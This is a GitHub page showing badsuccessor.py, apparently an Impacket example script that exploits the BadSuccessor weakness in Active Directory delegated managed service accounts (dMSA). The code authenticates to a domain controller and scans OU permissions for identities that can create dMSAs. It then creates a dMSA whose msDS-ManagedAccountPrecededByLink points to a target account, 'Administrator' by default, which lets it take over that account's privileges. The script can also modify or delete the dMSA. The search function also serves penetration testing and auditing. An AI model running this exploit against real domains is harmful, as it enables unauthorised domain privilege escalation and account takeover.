forked from fortra/impacket
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathbadsuccessor.py
More file actions
769 lines (628 loc) · 33.6 KB
/
badsuccessor.py
File metadata and controls
769 lines (628 loc) · 33.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This script is a tool for dMSA exploitation.
# Search function is based on AKAMAI Get-BadSuccessorOUPermissions.ps1 (https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1)
# It allows to add/delete Delegated Managed Service Accounts (dMSA) in a specific OU, search for OUs vulnerable to BadSuccessor attack
# Author:
# Ilya Yatsenko (@fulc2um)
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import logging
import random
import string
import sys
import ldap3
from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_identity, parse_target, init_ldap_session
from impacket.ldap import ldaptypes
class BADSUCCESSOR:
def __init__(self, username, password, domain, lmhash, nthash, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = lmhash
self.__nthash = nthash
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__target = cmdLineOptions.dc_host
self.__kdcHost = cmdLineOptions.dc_host
self.__dmsaName = cmdLineOptions.dmsa_name
self.__method = cmdLineOptions.method
self.__port = cmdLineOptions.port
self.__action = cmdLineOptions.action
self.__targetIp = cmdLineOptions.dc_ip
self.__baseDN = cmdLineOptions.baseDN
self.__targetOu = cmdLineOptions.target_ou
self.__principalsAllowed = cmdLineOptions.principals_allowed
self.__targetAccount = cmdLineOptions.target_account
self.__dnsHostName = cmdLineOptions.dns_hostname
if self.__targetIp is not None:
self.__kdcHost = self.__targetIp
if self.__method not in ['LDAP', 'LDAPS']:
raise ValueError("Unsupported method %s" % self.__method)
if self.__doKerberos and cmdLineOptions.dc_host is None:
raise ValueError("Kerberos auth requires DNS name of the target DC. Use -dc-host.")
if self.__method == 'LDAPS' and not '.' in self.__domain:
logging.warning('\'%s\' doesn\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)
if self.__target is None:
if not '.' in self.__domain:
logging.warning('No DC host set and \'%s\' doesn\'t look like a FQDN. DNS resolution of short names will probably fail.' % self.__domain)
self.__target = self.__domain
if self.__port is None:
if self.__method == 'LDAP':
self.__port = 389
elif self.__method == 'LDAPS':
self.__port = 636
def run(self):
# Create the baseDN if not provided
if self.__baseDN is None:
domainParts = self.__domain.split('.')
self.__baseDN = ''
for i in domainParts:
self.__baseDN += 'dc=%s,' % i
# Remove last ','
self.__baseDN = self.__baseDN[:-1]
try:
use_ldaps = (self.__method == 'LDAPS')
# For Kerberos authentication, ensure proper target resolution
if self.__doKerberos:
target_host = self.__target if self.__target else self.__domain
dc_ip = self.__kdcHost if self.__kdcHost else self.__targetIp
else:
target_host = self.__target if self.__target else self.__domain
dc_ip = self.__targetIp
_, ldapConnection = init_ldap_session(
domain=self.__domain,
username=self.__username,
password=self.__password,
lmhash=self.__lmhash,
nthash=self.__nthash,
k=self.__doKerberos,
dc_ip=dc_ip,
dc_host=target_host,
aesKey=self.__aesKey,
use_ldaps=use_ldaps
)
except Exception as e:
raise Exception('Could not connect to LDAP server: %s' % str(e))
# Update target for logging
connectTo = dc_ip if dc_ip else target_host
logging.info('Connected to %s as %s\\%s' % (connectTo, self.__domain, self.__username))
if self.__action == 'add':
result = self.add_dmsa(ldapConnection)
elif self.__action == 'delete':
result = self.delete_dmsa(ldapConnection)
elif self.__action == 'modify':
result = self.modify_dmsa(ldapConnection)
elif self.__action == 'search':
result = self.search_ous(ldapConnection)
else:
logging.error('Unknown action: %s' % self.__action)
result = False
ldapConnection.unbind()
return result
def delete_dmsa(self, ldapConnection):
try:
if not self.__dmsaName:
logging.error('dMSA name is required for deletion. Use -dmsa-name parameter.')
return False
if not self.__targetOu:
logging.error('Target OU is required for dMSA deletion. Use -target-ou parameter.')
return False
dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)
if not self.check_account_exists(ldapConnection, dmsa_dn):
logging.error('dMSA account does not exist: %s' % dmsa_dn)
return False
success = ldapConnection.delete(dmsa_dn)
logging.info("")
logging.info("%-30s %s" % ("dMSA Deletion Results", ""))
logging.info("%-30s %s" % ("-" * 30, "-" * 30))
logging.info("%-30s %s" % ("dMSA Name:", '%s$' % self.__dmsaName))
logging.info("%-30s %s" % ("Status:", "SUCCESS" if success else "FAILED"))
if not success and ldapConnection.result:
logging.error("%-30s %s" % ("Error:", ldapConnection.result))
return success
except Exception as e:
logging.error('dMSA deletion failed: %s' % str(e))
return False
def check_account_exists(self, ldapConnection, dn):
try:
success = ldapConnection.search(
search_base=dn,
search_filter='(objectClass=*)',
search_scope=ldap3.BASE,
attributes=['cn']
)
return success and len(ldapConnection.entries) > 0
except Exception as e:
logging.debug('Error checking account existence: %s' % str(e))
# If we can't determine, assume it doesn't exist to avoid blocking operations
return False
def search_ous(self, ldapConnection):
try:
logging.info('Searching for OUs vulnerable to BadSuccessor attack...')
if not ldapConnection.bound:
logging.error('LDAP connection is not bound')
return False
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter='(&(objectCategory=computer)(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))',
search_scope=ldap3.SUBTREE,
attributes=['operatingSystem', 'operatingSystemVersion']
)
if not success:
logging.error('Failed to search for Domain Controllers: %s' % ldapConnection.result)
return False
prereq_flag = False
for entry in ldapConnection.entries:
if ('operatingSystem' and 'operatingSystemVersion') not in entry:
logging.error('Could not retrieve operating system information for Domain Controller: %s' % entry.entry_dn)
pass
else:
if 'Windows Server 2025' in entry.operatingSystem.value or '26100' in entry.operatingSystemVersion.value:
logging.info('Found Windows Server 2025 Domain Controller: %s' % entry.entry_dn)
prereq_flag = True
break
if not prereq_flag:
logging.info('No Windows Server 2025 Domain Controllers found. This script requires at least one DC running Windows Server 2025.')
logging.info('Resulting list of Identities/OUs will show Identities that have permissions to create objects in OUs.')
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter='(objectClass=organizationalUnit)',
search_scope=ldap3.SUBTREE,
attributes=['distinguishedName', 'nTSecurityDescriptor'],
controls=ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x5)
)
if not success:
logging.error('Failed to search for organizational units: %s' % ldapConnection.result)
return False
# Store the OU entries before they get overwritten by other searches
ou_entries = list(ldapConnection.entries)
logging.info('Found %d organizational units' % len(ou_entries))
# Get domain SID for filtering excluded accounts
try:
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter='(objectClass=domain)',
search_scope=ldap3.BASE,
attributes=['objectSid']
)
if success and len(ldapConnection.entries) > 0:
entry = ldapConnection.entries[0]
if 'objectSid' in entry:
domain_sid = entry.objectSid.value
except Exception as e:
logging.error('Failed to retrieve domain SID: %s' % str(e))
return False
allowed_identities = {}
relevant_rights = {
"CreateChild": 0x00000001,
"GenericAll": 0x10000000,
"WriteDACL": 0x00040000,
"WriteOwner": 0x00080000
}
relevant_object_types = {
"00000000-0000-0000-0000-000000000000": "All Objects",
"0feb936f-47b3-49f2-9386-1dedc2c23765": "msDS-DelegatedManagedServiceAccount",
}
for entry in ou_entries:
try:
ou_dn = str(entry.entry_dn)
if 'nTSecurityDescriptor' not in entry or not entry.nTSecurityDescriptor.value:
continue
sd_data = entry.nTSecurityDescriptor.value
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data)
# Process DACL entries (ACEs)
dacl = sd['Dacl']
if dacl and hasattr(dacl, 'aces') and dacl.aces:
for ace in dacl.aces:
# Only process ALLOW ACEs
if ace['AceType'] != ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:
continue
# Check if ACE has relevant rights
mask = int(ace['Ace']['Mask']['Mask'])
has_relevant_right = any(mask & right_value for right_value in relevant_rights.values())
if not has_relevant_right:
continue
# Check object type (must match relevant object types)
object_type = getattr(ace['Ace'], 'ObjectType', None)
if object_type:
object_guid = str(object_type).lower()
if object_guid not in relevant_object_types:
continue
sid = ace['Ace']['Sid'].formatCanonical()
if self.is_excluded_sid(sid, domain_sid):
continue
identity = self.resolve_sid_to_name(ldapConnection, sid)
if identity not in allowed_identities:
allowed_identities[identity] = []
if ou_dn not in allowed_identities[identity]:
allowed_identities[identity].append(ou_dn)
try:
owner_sid = sd['OwnerSid'].formatCanonical()
if not self.is_excluded_sid(owner_sid, domain_sid):
identity = self.resolve_sid_to_name(ldapConnection, owner_sid)
if identity not in allowed_identities:
allowed_identities[identity] = []
if ou_dn not in allowed_identities[identity]:
allowed_identities[identity].append(ou_dn)
except:
pass
except Exception as e:
continue
if allowed_identities:
logging.info('Found %d identities with BadSuccessor privileges:' % len(allowed_identities))
logging.info("")
logging.info("%-50s %s" % ("Identity", "Vulnerable OUs"))
logging.info("%-50s %s" % ("-" * 50, "-" * 30))
for identity, ous in allowed_identities.items():
ou_list = "{%s}" % ", ".join(ous)
logging.info("%-50s %s" % (identity[:50], ou_list))
else:
logging.info('No identities found with BadSuccessor privileges')
logging.info("")
logging.info("%-50s %s" % ("Identity", "Vulnerable OUs"))
logging.info("%-50s %s" % ("-" * 50, "-" * 30))
logging.info("%-50s %s" % ("(none)", "(none)"))
return True
except Exception as e:
logging.error('BadSuccessor search failed: %s' % str(e))
return False
def is_excluded_sid(self, sid, domain_sid):
excluded_sids = ["S-1-5-32-544", "S-1-5-18"] # BUILTIN\Administrators, SYSTEM
excluded_suffixes = ["-512", "-519"] # Domain Admins, Enterprise Admins
if sid in excluded_sids:
return True
if domain_sid and sid.startswith(domain_sid):
for suffix in excluded_suffixes:
if sid.endswith(suffix):
return True
return False
def resolve_sid_to_name(self, ldapConnection, sid):
try:
# Handle well-known SIDs
well_known_sids = {
'S-1-1-0': 'Everyone',
'S-1-5-11': 'NT AUTHORITY\\Authenticated Users',
'S-1-5-32-544': 'BUILTIN\\Administrators',
'S-1-5-32-545': 'BUILTIN\\Users',
'S-1-5-32-546': 'BUILTIN\\Guests',
'S-1-5-18': 'NT AUTHORITY\\SYSTEM',
'S-1-5-19': 'NT AUTHORITY\\LOCAL SERVICE',
'S-1-5-20': 'NT AUTHORITY\\NETWORK SERVICE',
'S-1-3-0': 'CREATOR OWNER',
'S-1-3-1': 'CREATOR GROUP',
'S-1-5-9': 'NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS',
'S-1-5-10': 'NT AUTHORITY\\SELF',
}
if sid in well_known_sids:
return well_known_sids[sid]
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter='(objectSid=%s)' % sid,
search_scope=ldap3.SUBTREE,
attributes=['sAMAccountName']
)
if success and len(ldapConnection.entries) > 0:
entry = ldapConnection.entries[0]
if 'sAMAccountName' in entry:
username = entry.sAMAccountName.value
return '%s\\%s' % (self.__domain.upper(), username)
return sid
except Exception as e:
logging.debug('Error resolving SID %s: %s' % (sid, str(e)))
return sid
def generate_dmsa_name(self):
random_suffix = ''.join(random.choices(string.ascii_uppercase + string.digits, k=8))
return 'dMSA-%s' % random_suffix
def convert_sid_to_string(self, sid_bytes):
try:
if not sid_bytes:
return None
if isinstance(sid_bytes, str):
sid_bytes = sid_bytes.encode('latin-1')
if len(sid_bytes) < 8:
return None
revision = sid_bytes[0]
authority_count = sid_bytes[1]
expected_length = 8 + (authority_count * 4)
if len(sid_bytes) < expected_length:
return None
authority = int.from_bytes(sid_bytes[2:8], 'big')
subauthorities = []
for i in range(authority_count):
offset = 8 + (i * 4)
if offset + 4 <= len(sid_bytes):
subauth = int.from_bytes(sid_bytes[offset:offset+4], 'little')
subauthorities.append(str(subauth))
else:
break
if subauthorities:
sid_string = 'S-%d-%d-%s' % (revision, authority, '-'.join(subauthorities))
else:
sid_string = 'S-%d-%d' % (revision, authority)
return sid_string
except Exception as e:
logging.debug('Error converting SID bytes to string: %s' % str(e))
return None
def build_security_descriptor(self, user_sid):
try:
if not user_sid:
return None
# Handle both string and bytes SID formats
if isinstance(user_sid, str):
if user_sid.startswith('S-'):
sid_string = user_sid
else:
return None
else:
sid_string = self.convert_sid_to_string(user_sid)
if not sid_string:
return None
sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
sd['Revision'] = b'\x01'
sd['Sbz1'] = b'\x00'
sd['Control'] = 32772
sd['OwnerSid'] = ldaptypes.LDAP_SID()
sd['OwnerSid'].fromCanonical(sid_string)
sd['GroupSid'] = b''
sd['Sacl'] = b''
acl = ldaptypes.ACL()
acl['AclRevision'] = 4
acl['Sbz1'] = 0
acl['Sbz2'] = 0
acl.aces = []
nace1 = ldaptypes.ACE()
nace1['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
nace1['AceFlags'] = 0x00
acedata1 = ldaptypes.ACCESS_ALLOWED_ACE()
acedata1['Mask'] = ldaptypes.ACCESS_MASK()
acedata1['Mask']['Mask'] = 0x000F01FF
acedata1['Sid'] = ldaptypes.LDAP_SID()
acedata1['Sid'].fromCanonical(sid_string)
nace1['Ace'] = acedata1
acl.aces.append(nace1)
nace2 = ldaptypes.ACE()
nace2['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
nace2['AceFlags'] = 0x00
acedata2 = ldaptypes.ACCESS_ALLOWED_ACE()
acedata2['Mask'] = ldaptypes.ACCESS_MASK()
acedata2['Mask']['Mask'] = 0x10000000 # GenericAll
acedata2['Sid'] = ldaptypes.LDAP_SID()
acedata2['Sid'].fromCanonical(sid_string)
nace2['Ace'] = acedata2
acl.aces.append(nace2)
sd['Dacl'] = acl
return sd.getData()
except Exception as e:
logging.debug('Error building security descriptor: %s' % str(e))
return None
def add_dmsa(self, ldapConnection):
try:
if not self.__dmsaName:
self.__dmsaName = self.generate_dmsa_name()
if not self.__targetOu:
logging.error('Target OU is required for dMSA creation. Use -target-ou parameter.')
return False
dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)
if self.check_account_exists(ldapConnection, dmsa_dn):
logging.error('dMSA account already exists: %s' % dmsa_dn)
return False
principals_allowed = self.__principalsAllowed if self.__principalsAllowed else self.__username
target_account = self.__targetAccount if self.__targetAccount else 'Administrator'
dns_hostname = self.__dnsHostName if self.__dnsHostName else '%s.%s' % (self.__dmsaName.lower(), self.__domain)
# Validate DNS hostname format
if not dns_hostname or '.' not in dns_hostname:
dns_hostname = '%s.%s' % (self.__dmsaName.lower(), self.__domain)
attributes = {
'objectClass': ['msDS-DelegatedManagedServiceAccount'],
'cn': self.__dmsaName,
'sAMAccountName': '%s$' % self.__dmsaName,
'dNSHostName': dns_hostname,
'userAccountControl': 4096,
'msDS-ManagedPasswordInterval': 30,
'msDS-DelegatedMSAState': 2,
'msDS-SupportedEncryptionTypes': 28,
'accountExpires': 9223372036854775807,
}
group_msa_membership = None
try:
search_filter = '(&(objectClass=user)(sAMAccountName=%s))' % principals_allowed
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter=search_filter,
search_scope=ldap3.SUBTREE,
attributes=['objectSid'])
if success and len(ldapConnection.entries) > 0:
entry = ldapConnection.entries[0]
if 'objectSid' in entry:
user_sid = entry.objectSid.value
if user_sid:
descriptor = self.build_security_descriptor(user_sid)
group_msa_membership = descriptor
attributes['nTSecurityDescriptor'] = descriptor
except Exception as e:
logging.debug('Error building MSA membership: %s' % str(e))
return False
if group_msa_membership:
attributes['msDS-GroupMSAMembership'] = group_msa_membership
target_dn = None
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter='(&(objectClass=*)(sAMAccountName=%s))' % target_account,
search_scope=ldap3.SUBTREE,
attributes=['distinguishedName', 'objectClass']
)
if success and len(ldapConnection.entries) > 0:
for entry in ldapConnection.entries:
object_classes = [str(oc).lower() for oc in entry.objectClass.values]
if 'user' in object_classes or 'computer' in object_classes:
target_dn = str(entry.entry_dn)
# Return first match if no user/computer found
target_dn = str(ldapConnection.entries[0].entry_dn)
if target_dn:
attributes['msDS-ManagedAccountPrecededByLink'] = target_dn
else:
logging.error('Target account not found: %s' % target_account)
return False
success = ldapConnection.add(dmsa_dn, attributes=attributes)
if success:
logging.info("")
logging.info("%-30s %s" % ("-" * 30, "-" * 30))
logging.info("%-30s %s" % ("dMSA Name:", '%s$' % self.__dmsaName))
logging.info("%-30s %s" % ("DNS Hostname:", attributes.get('dNSHostName', 'Unknown')))
logging.info("%-30s %s" % ("Migration status: ", attributes.get('msDS-DelegatedMSAState', 'Unknown')))
logging.info("%-30s %s" % ("Principals Allowed:", principals_allowed))
logging.info("%-30s %s" % ("Target Account:", target_account))
return True
else:
if ldapConnection.result:
logging.error('LDAP error: %s' % ldapConnection.result)
return False
except Exception as e:
logging.error('dMSA creation failed: %s' % str(e))
return False
def modify_dmsa(self, ldapConnection):
try:
dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)
if not self.check_account_exists(ldapConnection, dmsa_dn):
logging.error('dMSA account does not exist: %s' % dmsa_dn)
return False
# Get current target account value
success = ldapConnection.search(
search_base=dmsa_dn,
search_filter='(objectClass=msDS-DelegatedManagedServiceAccount)',
search_scope=ldap3.BASE,
attributes=['msDS-ManagedAccountPrecededByLink']
)
current_target_dn = None
if success and len(ldapConnection.entries) > 0:
entry = ldapConnection.entries[0]
if hasattr(entry, 'msDS-ManagedAccountPrecededByLink'):
current_target_dn = entry['msDS-ManagedAccountPrecededByLink'].value
success = ldapConnection.search(
search_base=self.__baseDN,
search_filter='(&(objectClass=*)(sAMAccountName=%s))' % self.__targetAccount,
search_scope=ldap3.SUBTREE,
attributes=['distinguishedName', 'objectClass']
)
if not (success and len(ldapConnection.entries) > 0):
logging.error('Target account not found: %s' % self.__targetAccount)
return False
target_dn = None
for entry in ldapConnection.entries:
object_classes = [str(oc).lower() for oc in entry.objectClass.values]
if 'user' in object_classes or 'computer' in object_classes:
target_dn = str(entry.entry_dn)
break
if not target_dn:
target_dn = str(ldapConnection.entries[0].entry_dn)
if current_target_dn == target_dn:
logging.info('Target account is already set to: %s' % target_dn)
logging.info('No modifications needed.')
return True
modifications = {
'msDS-ManagedAccountPrecededByLink': [(ldap3.MODIFY_REPLACE, [target_dn])]
}
success = ldapConnection.modify(dmsa_dn, modifications)
if success:
logging.info('dMSA target account modified: %s -> %s' % (current_target_dn or '(not set)', target_dn))
return True
else:
logging.error('Failed to modify dMSA: %s' % ldapConnection.result)
return False
except Exception as e:
logging.error('Error modifying dMSA: %s' % str(e))
return False
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "dMSA exploitation tool.")
parser.add_argument('account', action='store', metavar='[domain/]username[:password]', help='Account used to authenticate to DC.')
parser.add_argument('-dmsa-name', action='store', metavar='dmsa_name', help='Name of dMSA to add. If omitted, a random dMSA-[A-Z0-9]{8} will be used.')
parser.add_argument('-action', choices=['add', 'delete', 'modify', 'search'], default='search', help='Action to perform: add (requires -target-ou), delete (requires -dmsa-name, -target-ou), modify (requires -dmsa-name, -target-ou and -target-account), or search a dMSA.')
parser.add_argument('-target-ou', action='store', metavar='OU_DN', help='Specific OU to check for dMSA creation capabilities (e.g., "OU=weakOU,DC=domain,DC=local")')
parser.add_argument('-principals-allowed', action='store', metavar='USERNAME', help='Username allowed to retrieve the managed password. If omitted, current username will be used.')
parser.add_argument('-target-account', action='store', metavar='USERNAME', default='Administrator', help='Target user or computer account DN to set for msDS-ManagedAccountPrecededByLink (can target Domain Controllers, Domain Admins, Protected Users, etc.)')
parser.add_argument('-dns-hostname', action='store', metavar='HOSTNAME', help='DNS hostname for the dMSA. If omitted, will be generated as dmsaname.domain.')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-method', choices=['LDAP', 'LDAPS'], default='LDAPS', help='Method of adding the computer. LDAPS has some certificate requirements and isn\'t always available.')
parser.add_argument('-port', type=int, choices=[389, 636], help='Destination port to connect to. LDAP defaults to 389, LDAPS to 636.')
group = parser.add_argument_group('LDAP')
group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP. If ommited, the domain part (FQDN) specified in the account parameter will be used.')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
group.add_argument('-dc-host', action='store',metavar = "hostname", help='Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used')
group.add_argument('-dc-ip', action='store',metavar = "ip", help='IP of the domain controller to use. Useful if you can\'t translate the FQDN.')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.action == 'add':
required_args = []
if not options.target_ou:
required_args.append('-target-ou')
if required_args:
parser.error('Action "add" requires the following arguments: %s' % ', '.join(required_args))
elif options.action == 'delete':
required_args = []
if not options.dmsa_name:
required_args.append('-dmsa-name')
if not options.target_ou:
required_args.append('-target-ou')
if required_args:
parser.error('Action "delete" requires the following arguments: %s' % ', '.join(required_args))
elif options.action == 'modify':
required_args = []
if not options.dmsa_name:
required_args.append('-dmsa-name')
if not options.target_ou:
required_args.append('-target-ou')
if not options.target_account:
required_args.append('-target-account')
if required_args:
parser.error('Action "modify" requires the following arguments: %s' % ', '.join(required_args))
logger.init(options.ts, options.debug)
if '@' in options.account and options.dc_host is None:
domain, username, password, remote_host = parse_target(options.account)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
options.dc_host = remote_host
if password == '' and username != '' and options.hashes is None and not options.no_pass and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
lmhash = ''
nthash = ''
if options.hashes is not None:
lmhash, nthash = options.hashes.split(':')
if lmhash == '':
lmhash = 'AAD3B435B51404EEAAD3B435B51404EE'
if options.aesKey is not None:
options.k = True
else:
domain, username, password, lmhash, nthash, options.k = parse_identity(options.account, options.hashes, options.no_pass, options.aesKey, options.k)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
try:
executer = BADSUCCESSOR(username, password, domain, lmhash, nthash, options)
executer.run()
except Exception as e:
print(str(e))